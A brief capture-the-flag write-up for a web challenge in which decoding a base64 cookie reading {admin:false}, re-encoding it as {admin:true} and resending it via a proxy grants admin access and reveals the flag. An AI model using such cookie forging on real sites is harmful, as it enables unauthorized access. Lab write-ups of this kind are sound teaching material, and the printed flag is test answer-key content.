Version
By |
Version |
Comment |
noraj |
1.0 |
Creation |
CTF
Description
If you could become admin you would get a flag. Link
Solution
- Launch Element Inspector of Firefox or the Firebug addon and use the network analyser.
- See the request cookie
e2FkbWluOmZhbHNlfQ==
- Un-base64 it:
1 2
| echo -n "e2FkbWluOmZhbHNlfQ==" | base64 -d && echo "" {admin:false}
|
- Edit the cookie and change the value to
{admin:true}
in base64
1 2
| echo -n "{admin:true}" | base64 e2FkbWluOnRydWV9
|
- Send it again with a proxy tool like Burp, ZAP, Temper Data
- And TADA! We get into the admin page:
Wow! You're an admin, maybe. Well anyway, here is your flag, ABCTF{don't_trust_th3_coooki3}